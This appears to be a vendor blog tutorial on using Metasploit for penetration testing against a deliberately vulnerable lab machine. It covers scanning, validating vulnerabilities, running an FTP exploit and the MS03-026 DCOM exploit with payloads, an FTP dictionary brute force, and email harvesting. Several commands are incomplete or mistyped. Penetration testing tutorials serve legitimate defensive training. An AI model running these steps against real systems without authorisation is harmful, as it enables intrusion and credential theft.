By Tim Keary, Copywriter, Comparitech

How do you know if your network is safe? Cybercrime is an everyday threat to companies. There is one hacking attack every 39 seconds. Some have turned to antivirus solutions or vulnerability scanners to stay protected, but these tools aren’t enough. Now, you need penetration testing, as well.

Penetration testing enables you to step into the shoes of an attacker and test your network for vulnerabilities. By getting there first, you can fix the issue before an attacker exploits it. Metasploit is one of the top penetration testing tools for simulating attacks. Here are 10 top tips for using Metasploit to harden your network:

  1. Run a discovery scan

Many hackers will go on a reconnaissance effort to gather information on the target before launching an attack. They collect on the devices you’re using, including the type of operating system. The information gathered is then used later on to find vulnerabilities to break into the network.

Metasploit can be used to run a discovery scan, a combination of a ping scan, port scan, OS/version detection, and a data import. After completing a scan, you will have a list of IPs with information on the services running on the machine.

You can run a Discovery Scan in Metasploit through the command prompt (which uses NMAP commands!). In this example, we’re going to scan a metasploitable machine. A metasploitable device is a virtual machine with lots of vulnerabilities.

To run a Discovery Scan, follow the instructions below:

To begin, start the metasploitable machine you want to attack and a Windows Server 2003 machine in metasploitable. Enter the following command (with the machine IP): net addr: IP

Next, start Metasploit. Enter the following command to scan in the specific IP range (in this example we’re using Kali Linux): msf > nmap -sn

To find the OS of one of the systems listed enter the following command with the IP address you want to attack: Nmap -sV-O -T4

At the bottom of the output, you will be able to see the OS the machine is running.

  1. Use the Help command to find a list of commands

Knowing what commands you have at your disposal is advantageous when using Metasploit. While you can look online for tutorials to learn new commands, you can also use the Help command to view a list in the Terminal. To view a list of commands, enter the following command:

msf > help

The screen will then show a list of commands with a description. Basic commands like search, use, back help, info, and exit will help you to make your way around. Once you become more familiar with Metasploit, you can start experimenting with more advanced commands and running payloads!

  1. Run a vulnerability scan

When trying to break into a network, an attacker is looking for a specific vulnerability to exploit. A vulnerability is an entire point that enables an attacker to gain access to a network without authorization. Running a vulnerability scan will highlight these vulnerabilities before an attacker finds them so you can remedy the issue.

You can run vulnerability scans with Metasploit. The commercial version of Metasploit uses Nexpose to run a scan.

First, you need to add then Nexpose console to the Metasploit user interface. You can do this by going to Administration > Global Settings > Expose Consoles > Configure a Nexpose Console

Next, enter the IP of the server, port number, user name, and password. Press Enable.

Click Nexpose and add the IP address of the network or host you want to scan.

Select a Scan template to start the scan

Go to Analysis > Host to view the scan results.

  1. Import data from a vulnerability scanner

If you’re using Metasploit, then the chances are you will be using other cybersecurity tools like vulnerability scanners. Metasploit allows you to import scan data from other vulnerability scanning tools for you to examine entry points.

You can import scan data from third-party vulnerability scanners like Nessus, Core, and Impact. These tools show you the weaknesses in your defenses that attackers will try to exploit.

To import data:

Complete a scan in NMAP

Save the scan results in XML format on your desktop

Open Metasploit and enter the following command: msf > db_import “path of xml file”

After completing the import, the prompt will generate a Successfully imported message

  1. Use task chains to schedule scans!

In Metasploit Pro (the paid version of Metasploit), there is a feature called Task Chains that allows you to schedule tasks and complete them automatically. You can use this feature to automatically run scans so that you don’t have to do it manually.

Available tasks include; SCAN, IMPORT, MEXPOSE, BRUTEFORCE, EXPLOIT, MODULE RUN, COLLECT EVIDENCE, CLEANUP, REPORT, and WEB SCAN. To schedule a scan, do the following:

Go to Tasks > Chains > New Task Chain.

Enter a Task Chain Name for the task

Click the + icon under Task Chain Name

Select SCAN from the list of task types

When the task configuration bullet points come up, click on the Schedule Now button

When the schedule table comes up select how often you want to run the task (Once, Hourly, Daily, Weekly, Monthly)

Click the Save button to save the task

  1. Validate vulnerabilities

Whenever you complete a vulnerability scan, you will have discovered the entry points an attacker could exploit. If there are a lot of vulnerabilities, it can be difficult and time-consuming to go through the list and solve each problem one-by-one. To help make things easier, Metasploit provides a feature called Vulnerability Validation Wizard.

The Vulnerability Validation Wizard ranks vulnerabilities in a list based on their risk to your network. Here you can prioritize your response and deal with the greatest risks first.

To use the Vulnerability Validation Wizard follow the instructions:

Open Metasploit Pro Web Console > Project > Vulnerability Validation

When the vulnerability validation page comes up, enter a Project Name and a Description of the project. Press Start

Click on Pull from Nexpose and check the Import existing Nexpose vulnerability data option

Click the Tag tab and check the Automatically Tag by OS option

Click the Exploit tab, check the Clean up sessions when done option under Sessions

Click on the Generate Report tab, select the format you want to use for your report, and the sections you want to use.

Press Start

Once the Validation Wizard comes up, press the Push Validations button at the top right of the page

You can view the results of the tested vulnerabilities by going clicking on Home > Project Name > Vulnerabilities. Exploited vulnerabilities will be marked Exploited.

  1. Use exploits to break into a device

After scoping out vulnerabilities and validating them, you are ready to break into a device. To gain access to a device, you can use an exploit, a script designed for compromising a machine. In this example, we’re going to try and exploit FTP:

To begin, enter the following command: msf > use “exploit path”

Enter the show options command to display the parameters you need to configure to run the exploit: msf > show options. RHOST and RPORT will be listed as required. RHOST is the target IP, and RPORT is the target port.

To run the exploit, you will have to set a target IP address and port. Enter the following command:

msf > set RHOST

msf > set RPORT 21

Use the run command: msf > run

If a new session starts, then you will have gained access to the system.

  1. Use payloads to interact with the compromised system

Payload is another word for a script that an attacker uses to interact with a compromised system. Attackers will use a payload to upload and execute malicious files onto the victim’s system. There are many different kinds of payloads, and the kind you use depends on the type of vulnerability you intend to exploit.

Attackers will use a payload that matches an exploit they found during an earlier vulnerability can. For example, if an attacker detects that you’re running a Windows Server 2003 machine, then they could use the DCOM MS03-026 vulnerability to attack you.

To use a payload, follow the instructions below:

Run a search command to look for an exploit or module that is effective at exploiting this vulnerability (in this example, we search for the DCOM vulnerability). Use the exploit with the best rank:  msf > search dcom

Now search for a list of available payloads with the following command: msf exploit (ms03_026_dcom) > show payloads

You will see a list of Compatible Payloads ranked. You want to choose on that allows you to Upload / Execute files or one marked VNC Server (the latter lets you inject a VNC server remotely). Set the payload you want to use: set PAYLOAD payloads /path

Now Set the LHOST (attacker IP), LPORT (attackers port), RPORT (victim IP), and RHOST (victim port). It should look something like this:

msf exploit (ms03_026_dcom) > set LHOST
msf exploit (ms03_026_dcom) > set LPORT 23524
msf exploit (ms03_026_dcom)>set RPORT 135
msf exploit (ms03_026_dcom)>set RHOAST

Enter the following command to start a new session: msf exploit (ms03_026_dcom) > exploit You can now interact with the machine through the payload’s settings.

  1. Launch a brute force attack

If an attacker has time to hack into your network, then they might try a brute force attack. In a brute force attack, a hacker tries all possible combinations of characters to gain access to a system and its login credentials. You can use Metasploit to simulate a brute force attack.

With Metasploit, you can launch brute force attacks against the metasploitable device in a range of ways, including through FTP, Telnet, and SSH. The medium you use depends on the type of service the system is running. In this section, we’re going to use FTP to attack the metasploitable device.

Create an auxiliary (small script) dictionary list at the root of your Kali machine to break into the metasploitable device.

In this example we will use the  auxiliary/scanner/ftp/ftp_login auxiliary to launch the attack: msf > use auxiliary/scanner/ftp/ftp_login

Now set the path of the file that includes the dictionary by entering the following command: msf auxiliary(ftp_login) > set PASS_FILE /root/pass.txt

Then select the target IP : msf auxiliary(ftp_login) > set RHOST

Now enter the run command: msf auxiliary(ftp_login) > run. If the attack has been successful, a session will launch. If it isn’t, you will have failed to access the login credentials.

  1. How to Obtain Email Account Information

Another risk factor that companies have to mitigate is the theft of account data. Cybercriminals are always on the lookout for email accounts to target and gain access to a network before launching an attack. You can use Metasploit to obtain email account information just like an attacker would.

We can collect emails with the search_email collector module:

Load the module by entering the following command: msf > use auxiliary/gather/search_email_collector

Now use the show options command to view the module options: msf > show options

Set a domain to collect data on: msd > set DOMAIN <> (Note that Google, Bing, and Yahoo email accounts will be searched for by default). You will then see a list of email addresses that have been “located.”

Test Your Defenses Before Cyber Criminals Do!

Putting your network under pressure with a penetration testing tool like Metasploit enables you to discover new ways to improve your defenses. Periodically addressing vulnerabilities will help to minimize your exposure and keep your network available.

Don’t be afraid to hack into the Metasploitable machine to develop your skills. Just remember that once you’re ready to try live devices, you need to obtain written permission from the owner first!

About the Author

Tim Keary. Since 2017 Tim has been a full-time tech copywriter. Tim writes extensively on net admin topics helping businesses and entrepreneurs to keep their data protected.

Our company website